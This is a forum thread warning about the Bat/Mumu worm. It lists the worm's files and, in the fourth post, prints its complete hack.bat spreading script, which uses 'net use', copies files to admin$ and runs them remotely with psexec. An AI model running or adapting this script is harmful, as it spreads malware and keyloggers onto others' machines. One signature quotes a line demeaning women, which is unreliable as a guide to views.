Results 1 to 4 of 4

Thread: Bat/Mumu Worm Picking Up Steam

  1. #1
    AO Security for Non-Geeks tonybradley's Avatar
    Join Date
    Aug 2002

    Bat/Mumu Worm Picking Up Steam

    This virus / worm is actually a couple weeks old, but it seems to be picking up steam. More reports are coming in about infected machines. Here is some info:

    This worm uses a set of batch files, a few utility programs, and a trojan to spread. It simply copies a set of many different files to target systems, and remotely executes a batch file on that system to spread further. The worm scans for IP addresses to infect, then copies over the various files, and runs again. It does not contain a damaging payload. The worm intends to capture typed keystrokes and send email to a configured address. However, some samples received by AVERT have a key program (PCGhost) replaced with the (nView Desktop Manager). The worm can continue to propagate, spreading this innocent file along the way. PCGhost is a "Potentially Unwanted Program" that monitors system usage, including typed keystrokes, logs this information to a file, and can send the information to a defined email address.

    The following files are associated with this worm. 10.BAT Runs HFind.exe, calls other BAT files
    hack.bat Attempts to copy all other files to remote share (admin$\system32) and remotely execute START.BAT
    HFind.exe IPCScan trojan
    ipc.bat Loops through IP list and calls HACK.BAT
    IPCPass.txt Temp file
    MUMA.BAT Creates log file and runs NWIZ.EXE
    NEAR.BAT Creates temp file and calls 10.bat
    NWIZe.EXE NVidia Desktop Manager application [Some samples contain the PCGhost application]
    NWIZe.INI NWIZe.exe config file
    NWIZe.IN_ NWIZe.exe config file
    pcMsg.dll PCGhost application file
    PSEXEC.EXE Remote Process Launch application
    RANDOM.BAT Creates random numbers, used for IP addresses to ping
    rep.EXE String replace application
    replace.bat Calls rep.exe with parameters
    START.BAT Main program that calls other BAT files
    tihuan.txt Work file
    Here is the link to more details on McAfee's site: AVERT- Bat/Mumu.worm

  2. #2
    Priapistic Monk KorpDeath's Avatar
    Join Date
    Dec 2001
    You are turning out to be the resident "harbinger of sorrow" now aren't you?

    There should be a competition of who can bring in the most alerts in a specified time. Hmm... maybe someone should ask for that to happen......
    Mankind have a great aversion to intellectual labor; but even supposing knowledge to be easily attainable, more people would be content to be ignorant than would take even a little trouble to acquire it.
    - Samuel Johnson

  3. #3
    AO Soccer Mom debwalin's Avatar
    Join Date
    Mar 2002
    Awwww, don't shoot the messenger Korp! Forewarned is forearmed, and if nothing else, it reminded me I needed to update my definitions
    Outside of a dog, a book is man's best friend. Inside of a dog it's too dark to read.

  4. #4
    Senior Member
    Join Date
    Nov 2001
    i had oppertunity to take a look at it last week. nice job of NT bat file programming. And from the looks of it, had copied itself onto 23 other machines before an AV update detected hfind.exe.

    it automates the net use command and copies all of its files over to the new drive on a successful attempt. it then makes a call to psexec to start the main bat file on the remote machine and continues on it merry way. simple but very affective.

    the infected machine was using an att dial-up which set itself up with file and print sharing enabled.

    here's hack.bat:

    net use \\%1\ipc$ %3 /u:"%2"
    copy 10.BAT \\%1\admin$\system32 /y
    copy hack.bat \\%1\admin$\system32 /y
    copy HFind.exe \\%1\admin$\system32 /y
    copy ipc.bat \\%1\admin$\system32 /y
    copy IPCPass.txt \\%1\admin$\system32 /y
    copy MUMA.BAT \\%1\admin$\system32 /y
    copy NWIZ_.EXE \\%1\admin$\system32 /y
    copy NWIZe.IN_ \\%1\admin$\system32 /y
    copy pcMsg.dll \\%1\admin$\system32 /y
    copy psexec.exe \\%1\admin$\system32 /y
    copy RANDOM.BAT \\%1\admin$\system32 /y
    copy rep.EXE \\%1\admin$\system32 /y
    copy replace.bat \\%1\admin$\system32 /y
    copy START.BAT \\%1\admin$\system32 /y
    copy tihuan.txt \\%1\admin$\system32 /y
    copy space.txt \\%1\admin$\system32 /y
    copy NEAR.BAT \\%1\admin$\system32 /y
    copy ntservice.exe \\%1\admin$\system32 /y
    copy NTService.ini \\%1\admin$\system32 /y
    copy ntservice.bat \\%1\admin$\system32 /y
    copy SS.bat \\%1\admin$\system32 /y
    start /i /min /wait /B psexec \\%1 -u %2 -p %3 -d cmd.exe /c ntservice.bat

    firewalls, firewalls, firewalls
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts